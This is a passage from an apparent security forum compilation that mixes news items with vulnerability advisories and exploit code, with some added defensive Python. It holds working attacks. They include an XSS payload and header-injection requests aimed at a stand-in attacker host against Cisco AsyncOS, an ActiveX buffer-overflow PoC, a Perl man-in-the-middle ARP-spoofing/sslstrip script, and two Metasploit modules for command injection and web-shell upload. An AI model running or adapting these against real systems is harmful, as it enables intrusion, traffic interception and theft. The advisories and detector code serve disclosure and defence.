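    tokens = re.findall(r"\(([^)]*)\)", rest) + [re.sub(r"\([^)]*\)", "", rest)]
    rights = set()
    for token in tokens:
        for part in token.split(","):
            if part and part not in INHERIT_FLAGS:
                rights.add(part)
    return who.strip(), rights


def weak_aces(acl_output):
    """ACEs granting a low-privileged principal write-class rights."""
    weak = []
    for line in acl_output.splitlines():
        ace = parse_ace(line)
        if ace and ace[0].lower() in LOW_PRIV_PRINCIPALS and ace[1] & WRITE_RIGHTS:
            weak.append(ace)
    return weak


def audit_service(sc_qc_output, acl_output):
    """Both checks combined into a list of human-readable findings."""
    findings = []
    for candidate in unquoted_path_candidates(service_binary_path(sc_qc_output)):
        findings.append("unquoted path: loader may try %s first" % candidate)
    for who, rights in weak_aces(acl_output):
        findings.append("%s holds %s on the service binary" % (who, ",".join(sorted(rights))))
    return findings


# Constructed samples transcribed from the advisory's 'sc qc', 'cacls' and 'icacls' output.
SC_QC_BEFORE = """SERVICE_NAME: Origin Client Service
        TYPE               : 10  WIN32_OWN_PROCESS
        BINARY_PATH_NAME   : C:\\Program Files (x86)\\Origin\\OriginClientService.exe
        SERVICE_START_NAME : LocalSystem
"""
CACLS_BEFORE = """c:\\Program Files (x86)\\Origin\\OriginClientService.exe Everyone:(ID)F
                                                       BUILTIN\\Users:(ID)F
                                                       NT AUTHORITY\\SYSTEM:(ID)F
                                                       BUILTIN\\Administrators:(ID)F
"""
SC_QC_AFTER = SC_QC_BEFORE.replace(
    "C:\\Program Files (x86)\\Origin\\OriginClientService.exe",
    '"C:\\Program Files (x86)\\Origin\\OriginClientService.exe"')
ICACLS_AFTER = """C:\\Program Files (x86)\\Origin\\OriginClientService.exe NT AUTHORITY\\SYSTEM:(I)(F)
                                                       BUILTIN\\Administrators:(I)(F)
                                                       BUILTIN\\Users:(I)(RX)
"""

if __name__ == "__main__":
    print("before vendor fix:", audit_service(SC_QC_BEFORE, CACLS_BEFORE))
    print("after vendor fix: ", audit_service(SC_QC_AFTER, ICACLS_AFTER))
```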
  4. I for one like the idea, the chat is pretty decent + good music! Good luck with the project.
  5. Technology that allows a drone to be piloted from the ground using only a person's brainwaves has been demonstrated in Portugal. The company behind the development, Tekever, said the technology could in the short term be used to enable people with restricted movement to control aircraft. Longer term the firm said piloting of larger jets, such as cargo planes, could be controlled in this way without the need for a crew on board. However, one aviation expert told the BBC he thought the industry would be unlikely to adopt such technology due to a perception of being potentially unsafe.

'Everyday activity'

Drone specialist Tekever, which works with security firms, police forces and the military, adapted existing Electroencephalography (EEG) technology so it could issue instructions to the software used to give the unmanned drone instructions. EEG works by detecting activity in specific parts of the brain. After several months of training, "pilots" are said to be able to teach their brain how to think about moving a small circle on a computer screen either up or down, which in turn steers the drone left or right.

"We believe people will be able to pilot aircraft just like they perform everyday activities like walking or running," said Ricardo Mendes, Tekever's chief operating officer. "We truly believe that Brainflight represents the beginning of a tremendous step change in the aviation field, empowering pilots and de-risking missions, and we're looking forward to deliver these benefits to the market with highly innovative products."

'Bridge too far'

In the future, some of this technology may be put to use to control much larger aircraft, although Mr Mendes acknowledged considerable challenges with both regulatory hurdles and public confidence. Those concerns were echoed by John Strickland, an independent aviation consultant based in London. "This to me is certainly at the moment a bridge too far," he told the BBC. "You could get someone radically-minded who might say it, but I'd be surprised if anyone would do it." Mr Strickland said the airline industry was instead focusing its innovation efforts towards things like better materials and more economical engines.

Mr Mendes said the technology would incorporate safety measures to counteract the effects of someone having, for example, a seizure while piloting. "There are algorithms on board that prevent bad things from happening," he told the BBC. He added: "Technology is evolving, regulations are evolving. [unmanned jets are] obviously going to happen. The question is not if, it's when."

Video + Source: HERE
  6. The U.S. Department of State's Transnational Organized Crime Rewards Program has put a $3 million bounty on Russian hacker Evgeniy Mikhailovich Bogachev for a number of cyber crimes he allegedly committed using Zeus malware. This is the largest bounty the U.S. has offered for information on a cybercriminal. The FBI had launched an investigation into Bogachev's activities and a notice on the Transnational Organized Crime Rewards Program page said it wants the cybercriminal, who went by the online names of lucky12345 and slavik, “for his alleged involvement in a wide-ranging racketeering enterprise that installed, without authorisation, malicious software known as ‘Zeus' on victims' computers." The agency and others have stepped up efforts to nab those behind Zeus and GameOver Zeus. The reward will be paid for information that leads to the arrest and/or conviction of Bogachev, who is believed to be living in Russia. Source
  7. Euro cybercrime cops have taken down the RAMNIT botnet, which has infected 3.2 million computers worldwide, including 33,000 in the UK. The National Crime Agency's cybercrime unit worked with cops in the Netherlands, Italy and Germany to shut down command-and-control servers used by the botnet. One of the servers was housed in Gosport, Hampshire. RAMNIT spread malware via innocuous-looking links sent in phishing emails or social networking websites, and has mainly been used to take money from bank accounts from people running Windows OSes. Europol was alerted to RAMNIT by Microsoft, after data analysis showed a big increase in infections. The operation to take down RAMNIT was co-ordinated by the Joint Cybercrime Action Taskforce based at Europol's European Cybercrime Centre. "This malware effectively gives criminals a back door so they can take control of your computer, access your images, passwords or personal data and even use it to circulate further spam messages or launch illegal attacks on other websites," said Steve Pye of the NCA's national cybercrime Unit. "As a result of this action, the UK is safer from RAMNIT, but it is important that individuals take action now to disinfect their machines, and protect their personal information," he added. The NCA is advising people to check whether their computer has been infected by downloading specialist disinfection software, which is available free of charge at CyberStreetWise or GetSafeOnline. Analysis is now taking place on the servers and an investigation is ongoing, said the NCA. Source
8. More than one million websites that run on the WordPress content management application run the risk of being completely hijacked by attackers exploiting a critical vulnerability in most versions of a plugin called WP-Slimstat. Versions prior to the recently released Slimstat 3.9.6 contain a readily guessable key that's used to sign data sent to and from visiting end-user computers, according to a blog post published Tuesday by Web security firm Sucuri. The result is a SQL injection vector that can be used to extract highly sensitive data, including encrypted passwords and the encryption keys used to remotely administer websites. "If your website uses a vulnerable version of the plugin, you’re at risk," Marc-Alexandre Montpas, a senior vulnerability researcher at Sucuri, wrote. "Successful exploitation of this bug could lead to Blind SQL Injection attacks, which means an attacker could grab sensitive information from your database, including username, (hashed) passwords and, in certain configurations, WordPress Secret Keys (which could result in a total site takeover)." The WP-Slimstat secret key is nothing more than the MD5 hash of the plugin’s installation timestamp. An attacker could use the Internet Archive or similar sites to determine the year a vulnerable site was put online. That would leave an attacker with about 30 million values to test, an undertaking that could be completed in about 10 minutes. Once the secret key has been divined, the attacker can use it to pull data out of the database. WP-Slimstat is an analytics tool. Its listing on WordPress shows it has been downloaded more than 1.3 million times. People who operate websites that use the plugin should update immediately. Post updated to change headline. It previously read: More than 1 million WordPress websites imperiled by critical plugin bug. Source
9. Summary:
1. Thanks for the sample file(s)
2. First view
3. Second view
4. More
Read more: http://dl.packetstormsecurity.net/papers/virus/fakeav-downloader-analysis.pdf
10. Cisco Ironport AsyncOS Cross Site Scripting

Vendor: Cisco
Product webpage: http://www.cisco.com
Affected version(s):
Cisco Ironport ESA - AsyncOS 8.0.1-023
Cisco Ironport WSA - AsyncOS 8.5.5-022
Cisco Ironport SMA - AsyncOS 8.4.0-126
Date: 24/02/2015
Credits: Glafkos Charalambous
CVE: CVE-2013-6780

Disclosure Timeline:
28-10-2014: Vendor Notification
28-10-2014: Vendor Response/Feedback
22-01-2015: Vendor Fix/Patch
24-02-2015: Public Disclosure

Description:
Cisco AsyncOS is vulnerable to unauthenticated Cross-site scripting (XSS), caused by improper validation of user supplied input in the (uploader.swf) Uploader component in Yahoo! versions 2.5.0 through 2.9.0. An attacker is able to inject arbitrary web script or HTML via the allowedDomain parameter.

XSS Payload:
http(s)://domain.com/yui/uploader/assets/uploader.swf?allowedDomain=\"})))}catch(e){alert('XSS');}//

References:
https://tools.cisco.com/bugsearch/bug/CSCur44409
https://tools.cisco.com/bugsearch/bug/CSCur89626
https://tools.cisco.com/bugsearch/bug/CSCur89624
http://yuilibrary.com/support/20131111-vulnerability/
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6780
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6780

Source
11. Ubisoft Uplay 5.0 Insecure File Permissions Local Privilege Escalation

Vendor: Ubisoft Entertainment S.A.
Product web page: http://www.ubi.com
Affected version: 5.0.0.3914 (PC)

Summary: Uplay is a digital distribution, digital rights management, multiplayer and communications service created by Ubisoft to provide an experience similar to the achievements/trophies offered by various other game companies. - Uplay PC is a desktop client which replaces individual game launchers previously used for Ubisoft games. With Uplay PC, you have all your Uplay enabled games and Uplay services in the same place and you get access to a whole new set of features for your PC games.

Desc: Uplay for PC suffers from an elevation of privileges vulnerability which can be used by a simple user that can change the executable file with a binary of choice. The vulnerability exists due to improper permissions, with the 'F' flag (Full) for the 'Users' group, making the entire directory 'Ubisoft Game Launcher' and its files and sub-dirs world-writable.

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience

Advisory ID: ZSL-2015-5230
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5230.php
Vendor: http://forums.ubi.com/forumdisplay.php/513-Uplay

19.02.2015

--

C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher>cacls Uplay.exe
C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\Uplay.exe BUILTIN\Users:(ID)F
                                                               NT AUTHORITY\SYSTEM:(ID)F
                                                               BUILTIN\Administrators:(ID)F
                                                               test-PC\yousir:(ID)F

C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher>

source
12. Cisco Ironport AsyncOS HTTP Header Injection

Vendor: Cisco
Product webpage: http://www.cisco.com
Affected version(s):
Cisco Ironport ESA - AsyncOS 8.0.1-023
Cisco Ironport WSA - AsyncOS 8.5.5-021
Cisco Ironport SMA - AsyncOS 8.4.0-138
Date: 24/02/2015
Credits: Glafkos Charalambous
CVE: CVE-2015-0624

Disclosure Timeline:
28-10-2014: Vendor Notification
28-10-2014: Vendor Response/Feedback
22-01-2015: Vendor Fix/Patch
20-02-2015: Vendor Advisory Release
24-02-2015: Public Disclosure

Description:
Cisco AsyncOS is vulnerable to unauthenticated HTTP Header Injection, caused by improper validation of user supplied input when handling HTTP Host and X-Forwarded-Host request headers. An attacker is able to inject crafted HTTP headers that could cause a web page redirection to a malicious website.

PoC #1

GET https://ironport:8443/network/wga_ip_interfaces HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
DNT: 1
Cookie: sid=jdLIhsguH36OUkUZqSpn; authenticated=pME7nskMH6zQ6JmonjZd
Connection: keep-alive
Content-Length: 0
Host: ironport:8443:@[attacker.com]

PoC #2

GET https://ironport:8443/network/wga_ip_interfaces HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
DNT: 1
Cookie: sid=jdLIhsguH36OUkUZqSpn; authenticated=pME7nskMH6zQ6JmonjZd
Connection: keep-alive
Content-Length: 0
Host: [attacker.com]

PoC #3

GET https://ironport:8443/monitor/wsa_user_report HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
DNT: 1
Cookie: sid=jdLIhsguH36OUkUZqSpn; authenticated=pME7nskMH6zQ6JmonjZd
Connection: keep-alive
Host: ironport:8443
X-Forwarded-Host: [attacker.com]

References:
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2015-0624

Source
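The defensive counterpart to the three PoCs above, as an added example that is not part of the advisory: validate the Host and X-Forwarded-Host headers against an allowlist before either is used to build a redirect, and honour X-Forwarded-Host only from a trusted reverse proxy. The allowlist, proxy range and sample requests are constructed for the example.

```python
"""Added example, not part of the advisory: validate the HTTP Host and
X-Forwarded-Host headers before either is used to build a redirect URL.
The advisory's PoCs send 'ironport:8443:@[attacker.com]', '[attacker.com]'
and an X-Forwarded-Host of '[attacker.com]'; a server that copies such a
value into a Location header sends the user off-site. The allowlist,
trusted-proxy range and sample requests below are constructed for the
example and are not taken from the appliance."""
import re
from ipaddress import ip_address, ip_network
from urllib.parse import urlunsplit

# Constructed configuration: names this host may legitimately be addressed as.
ALLOWED_HOSTS = {"ironport", "ironport.example.test"}
# Constructed: only a reverse proxy in this range may set X-Forwarded-Host.
TRUSTED_PROXIES = [ip_network("10.0.0.0/8")]

# A plain host[:port] per RFC 3986 reg-name: letters, digits, '.', '-',
# optionally one ':port'. This excludes '@', '[', ']' and a second ':'.
_HOST_RE = re.compile(r"(?P<host>[A-Za-z0-9.-]{1,253})(?::(?P<port>\d{1,5}))?")


def parse_host(value):
    """Return (host, port_or_None) when value is a well-formed host[:port]
    whose host is on the allowlist; return None otherwise."""
    m = _HOST_RE.fullmatch(value.strip())
    if m is None:
        return None
    host = m.group("host").lower()
    port = m.group("port")
    if port is not None and not 0 < int(port) < 65536:
        return None
    if host not in ALLOWED_HOSTS:
        return None
    return host, port


def effective_host(headers, client_ip):
    """Choose the header that names this site. X-Forwarded-Host is honoured
    only when the TCP peer is a trusted proxy; otherwise it is ignored."""
    peer = ip_address(client_ip)
    from_proxy = any(peer in net for net in TRUSTED_PROXIES)
    raw = headers.get("Host")
    if from_proxy and "X-Forwarded-Host" in headers:
        raw = headers["X-Forwarded-Host"]
    if raw is None:
        return None
    return parse_host(raw)


def redirect_location(headers, client_ip, path="/network/wga_ip_interfaces"):
    """Build the Location value for a same-site redirect, or None to refuse
    the redirect rather than emit an attacker-chosen host."""
    parsed = effective_host(headers, client_ip)
    if parsed is None:
        return None
    host, port = parsed
    netloc = f"{host}:{port}" if port else host
    return urlunsplit(("https", netloc, path, "", ""))


if __name__ == "__main__":
    # Constructed requests mirroring the advisory's three PoCs, then a clean one.
    for hdrs in (
        {"Host": "ironport:8443:@[attacker.com]"},
        {"Host": "[attacker.com]"},
        {"Host": "ironport:8443", "X-Forwarded-Host": "[attacker.com]"},
        {"Host": "ironport:8443"},
    ):
        print(hdrs, "->", redirect_location(hdrs, "192.0.2.10"))
```

The first two PoC shapes are refused outright; the third is neutralised because X-Forwarded-Host from a non-proxy peer is never consulted.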
13. Webgate technology is focused on digital image processing, embedded system design and networking to produce embedded O/S and web server cameras providing real time images. We are also making superior network stand-alone DVRs by applying our accumulated network and video solution knowledge. WEBGATE Embedded Standard Protocol (WESP) SDK supports same tools in both network DVR and network camera.

Webgate Inc. Business Partners: Honeywell, Samsung Techwin, Bosch, Pentax Technology, Fujitsu AOS Technology, inc
http://www.webgateinc.com/wgi/eng/#2
http://www.webgateinc.com/wgi_htdocs/eng/sdk_info.html

Vulnerability 1: WESP SDK WESPMONITORLib.WESPMonitorCtrl ActiveX LoadImage Buffer Overflow
Vulnerability 2: WESP SDK WESPCONFIGLib.UserItem ActiveX ChangePassword Buffer Overflow
Vulnerability 3: WESP SDK WESPMONITORLib.WESPMonitorCtrl ActiveX LoadImageEx Buffer Overflow
Vulnerability 4: WESP SDK WESPSERIALPORTLib.WESPSerialPortCtrl ActiveX Connect Buffer Overflow
Vulnerability 5: WESP SDK WESPCONFIGLib.IDList ActiveX AddID Buffer Overflow
Vulnerability 6: WESP SDK WESPPLAYBACKLib.WESPPlaybackCtrl ActiveX Connect Buffer Overflow
Vulnerability 7: WESP SDK WESPPLAYBACKLib.WESPPlaybackCtrl ActiveX ConnectEx3 Buffer Overflow

CompanyName WebgateInc
FileDescription WESPConfig Module
FileVersion 1, 6, 42, 0
InternalName WESPConfig
LegalCopyright Copyright (C) 2004-2010
OriginalFileName WESPConfig.DLL
ProductName WESPConfig Module
ProductVersion 1, 6, 42, 0

******************PoC for one of the above Vulnerabilities***********
<html>
<object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='target'> </object>
<!--
targetFile = "C:\Windows\System32\WESPSDK\WESPPlayback.dll"
prototype = "Sub ConnectEx3 ( ByVal bDvrs As Integer , ByVal Address As String , ByVal Port As Integer , ByVal UserID As String , ByVal Password As String , ByVal extcompany As Long , ByVal authType As Long , ByVal AdditionalCode As String )"
memberName = "ConnectEx3"
progid = "WESPPLAYBACKLib.WESPPlaybackCtrl"
argCount = 8
-->
<script language='vbscript'>
arg1=1
arg2=String(1044, "A")
arg3=1
arg4="defaultV"
arg5="defaultV"
arg6=1
arg7=1
arg8="defaultV"
target.ConnectEx3 arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6 ,arg7 ,arg8
</script>
</html>
******************************

Stack trace for above PoC

Exception Code: ACCESS_VIOLATION
Disasm: 76ACD33D MOV CX,[EAX]

Seh Chain:
--------------------------------------------------
1 41414141

Called From          Returns To
--------------------------------------------------
msvcrt.76ACD33D      WESPPlayback.999539
WESPPlayback.999539  41414141
41414141             22E5E0
22E5E0               2F712C
2F712C               41414141
41414141             41414141
41414141             41414141
41414141             41414141

Registers:
--------------------------------------------------
EIP 76ACD33D
EAX 41414141
EBX 039E0040 -> 009DF298
ECX E0551782
EDX 41414141
EDI 76AD4137 -> 8B55FF8B
ESI 76ACD335 -> 8B55FF8B
EBP 0022E56C -> 039E0020
ESP 0022E56C -> 039E0020

Block Disassembly:
--------------------------------------------------
76ACD333 NOP
76ACD334 NOP
76ACD335 MOV EDI,EDI
76ACD337 PUSH EBP
76ACD338 MOV EBP,ESP
76ACD33A MOV EAX,[EBP+8]
76ACD33D MOV CX,[EAX] <--- CRASH
76ACD340 INC EAX
76ACD341 INC EAX
76ACD342 TEST CX,CX
76ACD345 JNZ SHORT 76ACD33D
76ACD347 SUB EAX,[EBP+8]
76ACD34A SAR EAX,1
76ACD34C DEC EAX
76ACD34D POP EBP

ArgDump:
--------------------------------------------------
EBP+8  41414141
EBP+12 0022E5E0 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16 002F712C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+20 00000829
EBP+24 002F712C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+28 0022E6D4 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Stack Dump:
--------------------------------------------------
22E56C 20 00 9E 03 39 95 99 00 41 41 41 41 E0 E5 22 00 [................]
22E57C 2C 71 2F 00 29 08 00 00 2C 71 2F 00 D4 E6 22 00 [.q.......q......]
22E58C B4 6F 2F 00 A0 E6 22 00 98 F2 9D 00 00 00 00 00 [.o..............]
22E59C B0 BA 2E 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]
22E5AC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]

P.S. CERT tried to coordinate with the vendor for fixing the issues but there wasn't any response from the vendor.

Best Regards,
Praveen Darshanam

Source
  14. Echoing the concerns many US-based technology companies have about US-led surveillance programs, Yahoo Chief Information Security Officer Alex Stamos asked the director of the National Security Agency some pointed questions concerning proposed or existing backdoors placed in encryption technologies. The responses from NSA Director Adm. Mike Rogers only underscored the growing divide. The frank exchange occurred Monday at the Cybersecurity for a New America conference in Washington DC. It came 17 months after materials leaked by former NSA subcontractor Edward Snowden documented NSA-engineered backdoors were built into widely used cryptography technologies so that government agents could decrypt communications. Critics have since warned that the policy could backfire on US citizens, since backdoors can be exploited by governments of a variety of countries. Rogers clearly disagreed, but his denials were notable for a lack of technical detail. What follows is an excerpt of the exchange, as first provided by website Just Security: Source
15.
#!/usr/bin/perl
use Term::ANSIColor;
############################################################################
print "**************************************************************\n"; #
print "+ -== JULI ==- +\n"; #
print "+ -== Man-in-the-middle Attack Script ==- +\n"; #
print "+ -== By em616 , em(at)em616.com , http://blog.em616.com ==- +\n"; #
print "**************************************************************\n"; #
############################################################################

# Cleaning stuff
system "killall -9 sslstrip arpspoof";
system "echo '0' > /proc/sys/net/ipv4/ip_forward";
system "iptables --table nat --flush";
system "iptables --flush";
system "iptables --delete-chain";
system "iptables --table nat --delete-chain";

#Making a Firewall, setting iptables rule to redirect port 80 to 5254
print color("bold red"), "Setting up the iptables roulle\n", color("reset");
print color("bold red"), ". . ..\n", color("reset");
system "iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 5254";

#Port Forwarding
print color("bold red"), "Setting up port fawarding on our box\n", color("reset");
system "echo '1' > /proc/sys/net/ipv4/ip_forward";

## Arpspoof Script, must specify your interface and router IP
if ($#ARGV < 0) {
    print q{
Enter your interface and router ip, Ex:
en@em616:~$ perl juli.pl wlan0 192.168.0.1
};
    exit;
} elsif ($#ARGV < 1) {
    print "You have not provided all of the arguments required\n";
    print color("bold green"), "perl juli.pl wlan0 192.168.0.1\n", color("reset");
    exit;
}

$interface = $ARGV[0];
$getway = $ARGV[1];
print color("bold red"), "Starting arpsoof on interface: $interface ip: $getway \n", color("reset");
system "arpspoof -i $interface $getway & sslstrip -a -k -l 5254 -w Juliscript.log";
print "Script stoped by you , check Juliscript.log if we found anything \n"
# LineAL

Source
16.
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HP Client Automation Command Injection',
      'Description'    => %q{
        This module exploits a command injection vulnerability on HP Client Automation,
        distributed actually as Persistent Systems Client Automation. The vulnerability
        exists in the Notify Daemon (radexecd.exe), which doesn't authenticate execution
        requests by default neither. This module has been tested successfully on HP Client
        Automation 9.00 over Windows 2003 SP2 and CentOS 5.
      },
      'Author'         =>
        [
          'Ben Turner', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2015-1497'],
          ['ZDI', '15-038'],
          ['URL', 'https://radiasupport.accelerite.com/hc/en-us/articles/203659814-Accelerite-releases-solutions-and-best-practices-to-enhance-the-security-for-RBAC-and-Remote-Notify-features']
        ],
      'Privileged'     => true,
      'Platform'       => %w{ unix win },
      'DefaultOptions' =>
        {
          'WfsDelay' => 10
        },
      'Payload'        => {'DisableNops' => true},
      'Targets'        =>
        [
          [ 'HP Client Automation 9.0.0 / Linux',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Payload' => {
                'Space' => 466,
                'EncoderType' => Msf::Encoder::Type::CmdUnixPerl,
                'Compat' => {
                  'PayloadType' => 'cmd',
                  'RequiredCmd' => 'openssl telnet generic gawk'
                },
                'BadChars' => "\x27"
              }
            }
          ],
          [ 'HP Client Automation 9.0.0 / Windows',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jan 02 2014'))

    register_options(
      [
        Opt::RPORT(3465)
      ], self.class)

    deregister_options('CMDSTAGER::FLAVOR')
    deregister_options('CMDSTAGER::DECODER')
  end

  def check
    connect
    sock.put("\x00") # port
    sock.put("#{rand_text_alphanumeric(4 + rand(3))}\x00") # user ID
    sock.put("#{rand_text_alpha(4 + rand(3))}\x00") # password
    sock.put("hide\x00") # command
    res = sock.get_once
    disconnect

    if res && res.unpack('C')[0] == 0
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    case target['Platform']
    when 'win'
      print_status('Exploiting Windows target...')
      execute_cmdstager({:flavor => :vbs, :linemax => 290})
    when 'unix'
      print_status('Exploiting Linux target...')
      exploit_unix
    else
      fail_with(Failure::NoTarget, 'Invalid target')
    end
  end

  def exploit_unix
    connect
    sock.put("\x00") # port
    sock.put("0\x00") # user ID
    sock.put("#{rand_text_alpha(4 + rand(3))}\x00") # password
    sock.put("hide hide\x09sh -c '#{payload.encoded.gsub(/\\/, "\\\\\\\\")}'\x00") # command, here commands can be injected
    disconnect
  end

  def execute_command(cmd, opts = {})
    connect
    sock.put("\x00") # port
    sock.put("S-1-5-18\x00") # user ID
    sock.put("#{rand_text_alpha(4 + rand(3))}\x00") # password
    sock.put("hide hide\"\x09\"cmd.exe /c #{cmd}&\"\x00") # command, here commands can be injected
    res = sock.get_once
    disconnect

    unless res && res.unpack('C')[0] == 0
      fail_with(Failure::Unknown, "Something failed executing the stager...")
    end
  end
end

Source
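From the defender's side of the module above, as an added example that is not part of the Metasploit code: a parser for the four NUL-terminated fields the module writes to the Notify Daemon (radexecd, TCP/3465) and a checker for the injection shape it relies on, a tab smuggled into the command field ahead of a shell invocation, with a privileged identity asserted and never verified. The captured byte strings are constructed; which values count as suspicious is this example's own assumption.

```python
"""Added example, not part of the Metasploit module above: a parser for the
request layout the module sends to the Notify Daemon (radexecd, TCP/3465)
and a checker for the injection pattern it relies on. The module writes
four NUL-terminated fields, port, user ID, password and command, and its
payloads put a tab (0x09) inside the command field followed by 'sh -c' or
'cmd.exe /c'. The captured byte strings below are constructed for the
example; which values count as suspicious is this example's assumption."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Interpreters that should not appear inside a notify command argument
# (assumption: legitimate notifications carry a bare command such as 'hide').
_SHELL_RE = re.compile(rb"\b(sh|bash|cmd\.exe|powershell)\b", re.IGNORECASE)
# Identities the module asserts without any credential check.
_PRIVILEGED_IDS = {b"0": "uid 0 (root)", b"S-1-5-18": "S-1-5-18 (LocalSystem)"}


@dataclass
class RadexecdRequest:
    port: bytes
    user_id: bytes
    password: bytes
    command: bytes
    findings: List[str] = field(default_factory=list)


def parse_request(raw: bytes) -> Optional[RadexecdRequest]:
    """Split a client-to-daemon stream into its four NUL-terminated fields.
    Returns None when fewer than four terminated fields are present."""
    parts = raw.split(b"\x00")
    if len(parts) < 5:          # four terminators produce at least five pieces
        return None
    return RadexecdRequest(*parts[:4])


def analyze(raw: bytes) -> Optional[RadexecdRequest]:
    """Parse and annotate a request with the signs of command injection the
    module exhibits: a tab separator inside the command field, a shell
    interpreter named there, or a privileged identity asserted without
    authentication."""
    req = parse_request(raw)
    if req is None:
        return None
    if b"\x09" in req.command:
        req.findings.append("tab byte inside command field")
    if _SHELL_RE.search(req.command):
        req.findings.append("shell interpreter named in command field")
    if req.user_id in _PRIVILEGED_IDS:
        req.findings.append("privileged user ID asserted: " + _PRIVILEGED_IDS[req.user_id])
    return req


# Constructed samples: what the module's check() sends, then the two
# injection shapes (with harmless placeholder commands).
BENIGN = b"\x00" + b"jsmith\x00" + b"abcd\x00" + b"hide\x00"
LINUX_STYLE = b"\x00" + b"0\x00" + b"abcd\x00" + b"hide hide\x09sh -c 'echo injected'\x00"
WINDOWS_STYLE = (b"\x00" + b"S-1-5-18\x00" + b"abcd\x00"
                 + b"hide hide\"\x09\"cmd.exe /c echo injected&\"\x00")

if __name__ == "__main__":
    for sample in (BENIGN, LINUX_STYLE, WINDOWS_STYLE):
        req = analyze(sample)
        print(req.user_id, req.command, req.findings)
```

The same field split applies to traffic captured on port 3465, so the checker can be run over a pcap's reassembled client streams to separate routine notifications from injected ones.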
17.
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'socket'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FileDropper
  include Msf::HTTP::Wordpress

  def initialize(info = {})
    super(update_info(
      info,
      'Name'            => 'WordPress Holding Pattern Theme Arbitrary File Upload',
      'Description'     => %q{
        This module exploits a file upload vulnerability in all versions of the
        Holding Pattern theme found in the upload_file.php script which contains
        no session or file validation. It allows unauthenticated users to upload
        files of any type and subsequently execute PHP scripts in the context of
        the web server.
      },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'Alexander Borg', # Vulnerability disclosure
          'Rob Carr <rob[at]rastating.com>' # Metasploit module
        ],
      'References'      =>
        [
          ['CVE', '2015-1172'],
          ['WPVDB', '7784'],
          ['URL', 'http://packetstormsecurity.com/files/130282/WordPress-Holding-Pattern-0.6-Shell-Upload.html']
        ],
      'DisclosureDate'  => 'Feb 11 2015',
      'Platform'        => 'php',
      'Arch'            => ARCH_PHP,
      'Targets'         => [['holding_pattern', {}]],
      'DefaultTarget'   => 0
    ))
  end

  def rhost
    datastore['RHOST']
  end

  def holding_pattern_uploads_url
    normalize_uri(wordpress_url_themes, 'holding_pattern', 'uploads/')
  end

  def holding_pattern_uploader_url
    normalize_uri(wordpress_url_themes, 'holding_pattern', 'admin', 'upload-file.php')
  end

  def generate_mime_message(payload, payload_name)
    data = Rex::MIME::Message.new
    target_ip = IPSocket.getaddress(rhost)
    field_name = Rex::Text.md5(target_ip)
    data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"#{field_name}\"; filename=\"#{payload_name}\"")
    data
  end

  def exploit
    print_status("#{peer} - Preparing payload...")
    payload_name = "#{Rex::Text.rand_text_alpha(10)}.php"
    data = generate_mime_message(payload, payload_name)

    print_status("#{peer} - Uploading payload...")
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => holding_pattern_uploader_url,
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'data' => data.to_s
    )

    fail_with(Failure::Unreachable, 'No response from the target') if res.nil?
    fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200

    payload_url = normalize_uri(holding_pattern_uploads_url, payload_name)
    print_status("#{peer} - Executing the payload at #{payload_url}")
    register_files_for_cleanup(payload_name)
    send_request_cgi({ 'uri' => payload_url, 'method' => 'GET' }, 5)
  end
end

Source
